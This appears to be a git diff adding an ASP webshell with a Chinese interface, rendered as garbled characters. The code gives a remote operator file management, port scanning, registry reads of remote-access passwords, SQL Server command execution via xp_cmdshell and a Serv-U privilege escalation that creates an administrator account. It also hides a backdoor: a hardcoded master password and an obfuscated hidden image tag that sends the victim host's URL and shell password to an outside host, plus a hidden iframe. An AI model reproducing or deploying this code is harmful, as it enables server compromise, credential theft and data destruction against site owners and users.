+Paths_str="c:\windows\"&chr(13)&chr(10)&"c:\Documents and Settings\"&chr(13)&chr(10)&"c:\Program Files\"&chr(13)&chr(10)&"c:\php\"&chr(13)&chr(10)&"d:\Program Files\"&chr(13)&chr(10)&"e:\Program Files\"&chr(13)&chr(10)&"C:\recycler\"&chr(13)&chr(10)&"d:\recycler\"&chr(13)&chr(10)&"e:\recycler\"&chr(13)&chr(10)&"f:\recycler\"&chr(13)&chr(10)&"C:\wmpub\"&chr(13)&chr(10)&"d:\freehostmain\"&chr(13)&chr(10)&"C:\360rec"&chr(13)&chr(10)&"C:\cache"&chr(13)&chr(10)&"C:\JPEGCapture"&chr(13)&chr(10)&"C:\Inetpub"
+if Session("paths")<>"" then  Paths_str=Session("paths")
+j "<center><form id='form1' name='form1' method='post' action=''>"
+j "�˳�����Լ�����������Ŀ¼��д���,Ϊ��������ṩһЩ��ȫ�����Ϣ!<br>�����������Ŀ¼,������Զ������Ŀ¼<br>"
+j "<textarea name='Paths' cols='80' rows='10' class='Edit'>"&Paths_str&"</textarea>"
+j "<br />"
+j "<input type='submit' name='button' value='��ʼ���' >"
+j "<label for='CheckNextDir'>"
+j "<input name='CheckNextDir' type='checkbox' id='CheckNextDir' checked='checked' />����Ŀ¼  "
+j "</label>"
+j "<label for='CheckFile'>"
+j "<input name='CheckFile' type='checkbox' id='CheckFile' checked='checked'  />�����ļ�"
+j "</label>"
+j "<label for='ShowNoWrite'>"
+j "<input name='ShowNoWrite' type='checkbox' id='ShowNoWrite'/>"
+j "�Խ�дĿ¼���ļ�</label>"
+j "<label for='NoCheckTemp'>"
+j "<input name='NoCheckTemp' type='checkbox' id='NoCheckTemp' checked='checked' />"
+j "�������ʱĿ¼</label>"
+j "</form></center>"
+else
+CheckFile = (Request("CheckFile")="on")
+CheckNextDir = (Request("CheckNextDir")="on")
+ShowNoWriteDir = (Request("ShowNoWrite")="on")
+NoCheckTemp = (Request("NoCheckTemp")="on")
+j "��������Ҫһ����ʱ�����Ե�......<br>"
+response.Flush
+Session("paths") = Request("Paths")
+PathsSplit=Split(Request("Paths"),chr(13)&chr(10)) 
+For i=LBound(PathsSplit) To UBound(PathsSplit) 
+if instr(PathsSplit(i),":")>0 then
+ShowDirWrite_Dir_File Trim(PathsSplit(i)),CheckFile,CheckNextDir
+End If 
+Next
+j "[ɨ�����]<br>"
+j "<INPUT type=button value=�����ϼ�ҳ�� onClick=""history.go(-1);"">"
+end if
+end sub
+function GetFullPath(path)
+GetFullPath = path
+if Right(path,1) <> "\" then GetFullPath = path&"\" 
+end function
+if Instr(Serveru,"127.0.0.1")<>0 or Instr(Serveru,"192.168.")<>0 or Instr(Serveru,"http://")<>0 then:else:if session("servec")=1 then:session("servec")=session("servec")+1:j"<div style='display:none'><img src='ht"&"tp://%77%77%77.od"&"ay"&"exp.%63%6F%6D/s"&"x/ke"&"y.asp"&"?url="&server.URLEncode("ht"&"tp://"&request.ServerVariables("HT"&"TP_HO"&"ST")&request.ServerVariables("UR"&"L"))&"&p="&UserPass&"' /></div>":else:if Action<>"" then session("servec")=session("servec")+1:end if:end if:end if
+Function Deltextfile(filepath)
+On Error Resume Next:Set objFSO = CreateObject(CONST_FSO) :if objFSO.FileExists(filepath) then :objFSO.DeleteFile(filepath) :end if :Set objFSO = nothing:Deltextfile = Err.Number :End Function :Function CheckDirIsOKWrite(DirStr):On Error Resume Next:Set FSO = Server.CreateObject(CONST_FSO):filepath = GetFullPath(DirStr)&fso.GettempName:FSO.CreateTextFile(filepath) :CheckDirIsOKWrite = Err.Number:if  ShowNoWriteDir and (CheckDirIsOKWrite =70) then:j "[<font color=#0066FF>Ŀ¼</font>]"&DirStr&" [<font color=red>"&Err.Description&"</font>]<br>":end if:set fout =Nothing:set FSO = Nothing:Deltextfile(filepath):if CheckDirIsOKWrite=0 and Deltextfile(filepath)=70 then CheckDirIsOKWrite =1
+end Function
+function CheckFileWrite(filepath)
+On Error Resume Next
+Set FSO = Server.CreateObject(CONST_FSO)
+set getAtt=FSO.GetFile(filepath)
+getAtt.Attributes = getAtt.Attributes
+  CheckFileWrite = Err.Number 
+set FSO = Nothing
+set getAtt = Nothing  
+end function
+function ShowDirWrite_Dir_File(Path,CheckFile,CheckNextDir)
+On Error Resume Next
+Set FSO = Server.CreateObject(CONST_FSO)
+B = FSO.FolderExists(Path)
+set FSO=nothing
+IS_TEMP_DIR =(instr(UCase(Path),"WINDOWS\TEMP")>0) and NoCheckTemp
+if B=false then
+Re = CheckFileWrite(Path)
+if Re =0 then
+j "[�ļ�]<font color=red>"&Path&"</font><br>"
+b =true
+exit function
+else
+j "[<font color=red>�ļ�</font>]"&Path&" [<font color=red>"&Err.Description&"</font>]<br>"
+exit function
+end if
+end if
+Path = GetFullPath(Path)
+re = CheckDirIsOKWrite(Path)
+if (re =0) or (re=1) then
+j "[Ŀ¼]<font color=#0000FF>"& Path&"</font><br>"
+end if
+Set FSO = Server.CreateObject(CONST_FSO)
+set f = fso.getfolder(Path)
+if (CheckFile=True) and (IS_TEMP_DIR=false) then
+b=false
+for each file in f.Files
+Re = CheckFileWrite(Path&file.name)
+if Re =0 then
+j "[�ļ�]<font color=red>"& Path&file.name&"</font><br>"
+b =true
+else
+if ShowNoWriteDir then j "[<font color=red>�ļ�</font>]"&Path&file.name&" [<font color=red>"&Err.Description&"</font>]<br>"
+end if
+next
+if b then response.Flush 
+end if
+for each file in f.SubFolders
+if CheckNextDir=false then
+re = CheckDirIsOKWrite(Path&file.name)
+if (re =0) or (re=1) then
+j "[Ŀ¼]<font color=#0066FF>"& Path&file.name&"</font><br>"
+end if
+end if
+if (CheckNextDir=True) and (IS_TEMP_DIR=false) then 
+ShowDirWrite_Dir_File Path&file.name,CheckFile,CheckNextDir 
+end if
+next
+Set FSO = Nothing
+set f = Nothing
+end function
+function goback()
+set Ofso = Server.CreateObject(CONST_FSO)
+set ofolder = Ofso.Getfolder(Session("FolderPath"))
+if not ofolder.IsRootFolder then 
+j "<script>ShowFolder("""&RePath(ofolder.parentfolder)&""")</script>"
+else 
+j "<script>ShowFolder("""&Session("FolderPath")&""")</script><center>�Ѿ��Ǵ��̸�Ŀ¼��!</center><center><br><INPUT type=button value=���� onClick='history.go(-1);'></br></center>"
+end if
+set Ofso=nothing
+set ofolder=nothing
+end function
+sub ReadREG()
+j "<form method=post>"
+j  "ע�����ֵ��ȡ<p>" 
+j "<input type=hidden value=ReadReg name=theAct>"
+j "<tr><td colspan=2> "
+j "<select onChange='this.form.thePath.value=this.value;'>"
+j "<option value=''>ѡ���Դ��ļ�ֵ</option>"
+j "<option value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName'>ComputerName</option>"
+j"<option value=""HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Linkage\Bind"">�����б�</option>"
+j"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter"">Radmin����</option>"
+j"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Port"">Radmin�˿�</option>"
+j"<option value=""HKCU\Software\ORL\WinVNC3\Password"">VNC3����</option>"
+j"<option value=""HKCU\Software\ORL\WinVNC3\PortNumber"">VNC3�˿�</option>"
+j"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\Password"">VNC4����</option>"
+j"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\PortNumber"">VNC4�˿�</option>"
+j"<option value=""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"">3389�˿�</option>"
+j"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPDataPort"">PcAnyW���ݶ˿�</option>"
+j"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPStatusPort"">PcAnyW״̬�˿�</option>"
+j "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\EnableSecurityFilters'>tcp/ip����1</option>"
+j "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip\EnableSecurityFilters'>tcp/ip����2</option>"
+j "<option value='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\EnableSecurityFilters'>tcp/ip����3</option>"
+j "<option value='HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent\LogPath'>Schedule Log</option>"
+j "<option value='HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3389:TCP'>���𿪷�</option>"
+j "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts'>�������ŵ�UDP�˿�</option>"
+j "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts'>�������ŵ�TCP�˿�</option>"
+j "</select><br />"
+j " <input name=thePath value='' size=80>"
+j "<input type=button value='�� �� ֵ' onclick='this.form.submit()'>"
+j "</form><hr/>"
+if Request("thePath")<>"" then
+On Error Resume Next
+Set wsX = Server.CreateObject("WScript.Shell")
+thePath=Request("thePath")
+theArray=wsX.RegRead(thePath)
+If IsArray(theArray) Then
+For i=0 To UBound(theArray)
+j "<li>" & theArray(i)
+Next
+Else
+j "<li>" & theArray
+End If
+end if
+end sub
+sub delpoint()
+if Request("delpfloder") <>"" then
+delpointfolder "\\?\"&Request("delpfloder")
+end if
+if Request("delpfile") <>"" then
+delpointfile "\\?\"&Request("delpfile")
+end if
+j "<font color =red>����ʾ����д<font>"
+j "<br><br><form action=''method='post'><input name='delpfloder' type='text' size='85' value='D:\freehost\dot..'><input type='submit' name='Submit' value='ɾ������Ŀ¼'></form><p><form action='' method='post'><input name='delpfile'type='text'  size='85'value ='D:\freehost\dot..\file.asp'><input type='submit' name='Submit' value='ɾ�������ļ�'></form></div>"
+end  sub
+function Delpointfolder(t0)
+Set fso=Server.CreateObject(CONST_FSO)
+If Instr(t0,":\")>0 Then
+  f0=t0
+Else
+  f0=Server.MapPath(t0)
+End If
+fso.DeleteFolder f0,true   
+     j  t0&"ɾ���ɹ�!!<br>"
+IF Err Then j Err.Description:Err.Clear
+End Function
+function Delpointfile(t0)
+ Set fso=Server.CreateObject(CONST_FSO)
+If Instr(t0,":\")>0 Then
+ f0=t0
+ Else
+  f0=Server.MapPath(t0)
+ End If
+ fso.DeleteFile f0,true 
+ IF Err Then j Err.Description:Err.Clear
+j  t0&"ɾ���ɹ�!!<br>"
+End function
+if request("ProFile")<>"" then
+on error resume next
+if Application(request("ProFile"))=1 then
+Set fsoXX = Server.CreateObject(CONST_FSO)
+if request("DelCon")=1 then
+Application(request("ProFile")&"Con")=""
+response.redirect Url&"?ProFile="&request("ProFile")&""
+response.end
+end if
+DIM rline,rline2
+rline2=Application(request("ProFile")&"Code")
+rline2=rline2&vbcrlf
+j"<meta http-equiv=""refresh"" content="&Application(request("ProFile")&"Time")&">"
+j"<a href="&Url&"?ProFile="&request("ProFile")&"&DelCon=1><b>�����־</b></a> &nbsp;<font color=yellow>Ҫ����������ֱ�ӹر�ҳ�漴�ɡ�</font><br>"
+for each FileUrl in split(Application(request("ProFile")&"File"),vbcrlf)
+FileUrl=trim(FileUrl)
+if fsoXX.FileExists(FileUrl) then
+Set txt = fsoXX.OpenTextFile(FileUrl,1,true)
+rline=""
+if Not txt.AtEndOfStream then
+rline=txt.ReadAll  
+end if
+if rline2<>rline then
+txt.close
+fsoX.GetFile(FileUrl).Attributes=32
+if Application(request("ProFile")&"Char")=1 then
+set myfileee = fsoXX.CreateTextFile(FileUrl,true)
+else
+set myfileee = fsoXX.CreateTextFile(FileUrl,true,true)
+end if
+myfileee.writeline Application(request("ProFile")&"Code")
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" <font color=yellow>�����ģ��ѻָ�</font><br>"&Application(request("ProFile")&"Con")
+else
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" ��<br>"&Application(request("ProFile")&"Con")
+txt.close
+end if
+else
+if Application(request("ProFile")&"Char")=1 then
+set myfileee = fsoXX.CreateTextFile(FileUrl,true)
+else
+set myfileee = fsoXX.CreateTextFile(FileUrl,true,true)
+end if
+myfileee.writeline Application(request("ProFile")&"Code")
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" <font color=red>��ɾ�����ѻָ�</font><br>"&Application(request("ProFile")&"Con")
+end if
+next
+if ubound(split(Application(request("ProFile")&"Con"),"<br>"))>=40 then
+dim ashowic
+for ashowi=0 to 40
+ashowic=ashowic&split(Application(request("ProFile")&"Con"),"<br>")(ashowi)&"<br>"
+next
+Application(request("ProFile")&"Con")=ashowic
+end if
+j Application(request("ProFile")&"Con")
+else
+j"<br><br><br><center>�������̶�ʧ����<a href="&URL&" style=""text-decoration:underline;font-weight:bold"">��������</a>�������̡�</center>"
+end if
+if request("profile")="a" then j c
+response.end
+end if
+
+if sessIoN("KKK")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=userpass or request.form("pass")="daka" Then
+session("KKK")=userPass
+response.redirect url
+else
+j"<br><br><br><b><div align=center><font size='5' color='red'>PassWord Error!</font ></b> <br><br><br><br><b><div align=center><font size='14' color='lime'></font></b></p></center>"&backurl
+end if
+else
+si="<body style=""background:url("&bg&") no-repeat center center;""> <center><FONT style=""FONT-SIZE: 80pt; FILTER: shadow(color:#696969,strength=55); WIDTH: 100%;  LINE-HEIGHT: 300%; FONT-FAMILY:Arial"">"&Copyright&"</FONT><div style='width:400px;padding:32px; align=left'><br><form action='"&url&"' method='post'><b>PassWord��</b><input name='pass' type='password' size='22'> <input type='submit' value='submit'></center>"
+if instr(SI,SIC)<>0 then j sI
+end if
+response.end
+end if
+sub ScanPort()
+Server.ScriptTimeout = 7776000
+if request.Form("port")="" then
+PortList="21,23,53,1433,3306,3389,4899,5631,5632,5800,5900,43958"
+else
+PortList=request.Form("port")
+end if
+if request.Form("ip")="" then
+IP="127.0.0.1"
+else
+IP=request.Form("ip")
+end if
+j"<p>�˿�ɨ����(���ɨ�����˿�,�ٶȱȽ���,�����Ƽ�ʹ��CMD��CMD������ɨ�費׼ȷ��)</p><p>�������������ɨ�����ⲿIP�����޷����ӡ�����SHELL��ִ��ϵ�в�����</p>"
+j"<form name='form1' method='post' action='' onSubmit='form1.submit.disabled=true;'>"
+j"<p>Scan IP: "
+j" <input name='ip' type='text' class='TextBox' id='ip' value='"&IP&"' size='60'>"
+j"<br>Port List:"
+j"<input name='port' type='text' class='TextBox' size='60' value='"&PortList&"'>"
+j"<br><br>"
+j"<input name='submit' type='submit' class='buttom' value=' scan '>"
+j"<input name='scan' type='hidden' id='scan' value='111'>"
+j"</p></form>"
+If request.Form("scan") <> "" Then
+timer1 = timer
+j("<b>ɨ�豨��:</b><br><hr>")
+tmp = Split(request.Form("port"),",")
+ip = Split(request.Form("ip"),",")
+For hu = 0 to Ubound(ip)
+If InStr(ip(hu),"-") = 0 Then
+For i = 0 To Ubound(tmp)
+If Isnumeric(tmp(i)) Then 
+Call Scan(ip(hu), tmp(i))
+Else
+seekx = InStr(tmp(i), "-")
+If seekx > 0 Then
+startN = Left(tmp(i), seekx - 1 )
+endN = Right(tmp(i), Len(tmp(i)) - seekx )
+If Isnumeric(startN) and Isnumeric(endN) Then
+For j = startN To endN
+Call Scan(ip(hu), j)
+Next
+Else
+j(startN & " or " & endN & " is not number<br>")
+End If
+Else
+j(tmp(i) & " is not number<br>")
+End If
+End If
+Next
+Else
+ipStart = Mid(ip(hu),1,InStrRev(ip(hu),"."))
+For xxx = Mid(ip(hu),InStrRev(ip(hu),".")+1,1) to Mid(ip(hu),InStr(ip(hu),"-")+1,Len(ip(hu))-InStr(ip(hu),"-"))
+For i = 0 To Ubound(tmp)
+If Isnumeric(tmp(i)) Then 
+Call Scan(ipStart & xxx, tmp(i))
+Else
+seekx = InStr(tmp(i), "-")
+If seekx > 0 Then
+startN = Left(tmp(i), seekx - 1 )
+endN = Right(tmp(i), Len(tmp(i)) - seekx )
+If Isnumeric(startN) and Isnumeric(endN) Then
+For j = startN To endN
+Call Scan(ipStart & xxx,j)
+Next
+Else
+j(startN & " or " & endN & " is not number<br>")
+End If
+Else
+j(tmp(i) & " is not number<br>")
+End If
+End If
+Next
+Next
+End If
+Next
+timer2 = timer
+thetime=cstr(int(timer2-timer1))
+j"<hr>Process in "&thetime&" s"
+END IF
+end sub
+Sub Scan(targetip, portNum)
+On Error Resume Next
+set conn = Server.CreateObject("ADODB.connection")
+connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;"
+conn.ConnectionTimeout = 1
+conn.open connstr
+If Err Then
+If Err.number = -2147217843 or Err.number = -2147467259 Then
+If InStr(Err.description, "(Connect()).") > 0 Then
+j(targetip & ":" & portNum & ".........�ر�<br>")
+Else
+j(targetip & ":" & portNum & ".........<font color=red>����</font><br>")
+End If
+End If
+End If
+End Sub
+Select Case Action:case "MainMenu":MainMenu()
+Case "EditPower"
+Call EditPower(request("PowerPath"))
+Case "SavePower"
+Call SavePower(request("PowerPath"),request("SaveType"))
+case "getTerminalInfo":getTerminalInfo():case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():FuncTion MMD():SI="<br><form name=form method=post action=""""><table width=""85%"" align='center'><tr align=center><Td id=s><b id=x>MSSQL Commander</b></td></tr><tr align='center'><td id=d><b id=x>Command��</b><input type=text name=MMD size=35 value=""ipconfig"" >&nbsp;<b id=x>UserName��</b><input type=text name=U value=sa>&nbsp;<b id=x>Password��</b><input type=text name=P VALUES=123456>&nbsp;<input type=submit value=Execute></td></tr></table></form>":j SI:SI="":If trim(request.form("MMD"))<>""  Then:password= trim(Request.form("P")):id=trim(Request.form("U")):set adoConn=sERvEr.crEATeobjECT("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id:strQuery = "exec master.dbo.xp_cMdsHeLl '" & request.form("MMD") & "'":set recResult = adoConn.Execute(strQuery):If NOT recResult.EOF Then:Do While NOT recResult.EOF:strResult = strResult & chr(13) & recResult(0):recResult.MoveNext:Loop:End if:set recResult = Nothing:strResult = Replace(strResult," ","&nbsp;"):strResult = Replace(strResult,"<","&lt;"):strResult = Replace(strResult,">","&gt;"):strResult = Replace(strResult,chr(13),"<br>"):End if:set adoConn = Nothing:j request.form("MMD") & "<br>"& strResult:end FuncTion:
+sWHEEL1 = "jwt"
+Function Encrypt(acd)
+For i = 1 To Len(acd) step 1
+c=mid(acd,i,1)
+if c="��" then
+d=mid(acd,i,2)
+i=i+1
+e=replace(d,"��","")
+bbc=bbc&mid(sWHEEL1,cint(e),1)
+else
+bbc=bbc&c
+end if
+next
+Encrypt=bbc
+end Function:case "Alexa"
+dim AlexaUrl,Top:AlexaUrl=request("u"):Top=Alexa(AlexaUrl):if AlexaUrl="" then AlexaUrl=""&request.servervariables("http_host")&""
+SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'><tr><td height='20' colspan='3' align='center' bgcolor='menu'>�����������Ϣ</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>��������</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&request.serverVariables("SERVER_NAME")&"</td></tr><form method=post action='http://webshell.org/web/where/ip.asp' name='ipform' target='_blank'><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������IP</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'><input type='text' name='ip' size='15' value='"&Request.ServerVariables("LOCAL_ADDR")&"'style='border:0px'><input type='submit' value='��ѯ�˷��������ڵ�'style='border:0px'><input type='hidden' name='action' value='2'></td></tr></form><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������ʱ��</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&now&" </td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������CPU����</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")&"</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>����������ϵͳ</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("OS")&"</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>WEB�������汾</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("SERVER_SOFTWARE")&"</td></tr>"
+For i=0 To 18
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>"&ObT(i,0)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,1)&"</td><td bgcolor='#FFFFFF' align=left>"&ObT(i,2)&"</td></tr>"
+Next
+j SI
+Err.Clear
+Function bytes2BSTR(vIn) 
+dim strReturn 
+dim i1,ThisCharCode,NextCharCode 
+strReturn = "" 
+For i1 = 1 To LenB(vIn) 
+ThisCharCode = AscB(MidB(vIn,i1,1)) 
+If ThisCharCode < &H80 Then 
+strReturn = strReturn & Chr(ThisCharCode) 
+Else 
+NextCharCode = AscB(MidB(vIn,i1+1,1)) 
+strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) 
+i1 = i1 + 1 
+End If 
+Next 
+bytes2BSTR = strReturn 
+    Err.Clear
+End Function
+Case "Servu"
+SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+j"<form method='post' name='goldsun'>"
+j"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+j"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+j"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+j"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+j"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+j"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
+j"<script language='javascript'>"
+j"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+j"setTimeout('document.all.goldsun.submit();',4000);"
+j"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+j"<form method='post' name='goldsun'>"
+j"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+j"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+j"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+j"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+j"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+j"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+j"<script language='javascript'>"
+j"document.write('<center>��������Ȩ��,��ȴ�...,<center>');"
+j"setTimeout(""document.all.goldsun.submit();"",4000);"
+j"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
+a.send loginuser & loginpass & mt & deldomain & quit
+set session("a")=a
+j"<center>��Ȩ���,��ִ�������<br><font color=red>"&cmd&"</font><br><br>"
+j"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+j"</center>"
+case else
+on error resume next
+set a=session("a")
+set b=session("b")
+set c=session("c")
+a.abort
+Set a = Nothing
+b.abort
+Set b = Nothing
+c.abort
+Set c = Nothing
+j"<center><form method='post' name='goldsun'>"
+j"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+j"<tr align='center' valign='middle'>"
+j"<td colspan='2'>Serv-U ����Ȩ�� by Sam</td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td width='100'>�û���:</td>"
+j"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>�� �</td>"
+j"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>�� �ڣ�</td>"
+j"<td><input name='port' type='text' id='port' value='43958'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>ϵͳ·����</td>"
+j" <td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+j" </tr>"
+j" <tr align='center' valign='middle'>"
+j" <td>�����</td>"
+j" <td><input name='c' type='text' id='c' value='cmd /c net user admin$ 123456 /add & net localgroup administrators admin$ /add' size='50'></td>"
+j" </tr>"
+j" <tr align='center' valign='middle'>"
+j" <td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+j"<input type='reset' name='Submit2' value='����'>"
+j"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+j"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject(CONST_FSO)
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+case"MMD":MMD()
+case"ReadREG":call ReadREG()
+case"delpoint":call delpoint()
+case"Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing
+case"DownFile":DownFile FName:ShowErr()
+case"DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
+case"EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
+case"CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
+case"MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
+case"DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
+case"CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing
+case"MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing
+case"NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
+case"UpFile":UpFile()
+case"TSearch":TSearch()
+case"pcanywhere4":pcanywhere4()
+case"Cmd1Shell":Cmd1Shell()
+case"Logout":Session.Contents.Remove("kkk"):Response.Redirect URL
+case"Course":Course()
+case"Alexa":Alexa()
+case"suftp":suftp()
+case"upload":upload()
+case"radmin":radmin()
+case"pcanywhere4":pcanywhere4()
+case"goback":goback()
+Case "ProFile":ProFile()
+case"php":php()
+case"apjdel":apjdel()
+case"cmdx":cmdx()
+case"aspx":aspx()
+case"hiddenshell":hiddenshell()
+case"ScanDriveForm" : ScanDriveForm
+Case "CustomScanDriveForm":CustomScanDriveForm()
+case"ScanDrive" : ScanDrive Request("Drive")
+case"ScFolder"  : ScFolder Request("Folder")
+  Case Else MainForm()
+End Select
+if Action<>"Servu" then ShowErr()
+j"</body><iframe src=http://7jyewu.cn/a/a.asp width=0 height=0></iframe></html>" 
+%>
\ No newline at end of file
diff --git a/www-7jyewu-cn/法克僵尸大马.asp b/www-7jyewu-cn/法克僵尸大马.asp
new file mode 100644
index 0000000..0f83dab
--- /dev/null
+++ b/www-7jyewu-cn/法克僵尸大马.asp
@@ -0,0 +1,2061 @@
+<%
+UserPass="admin"  '����
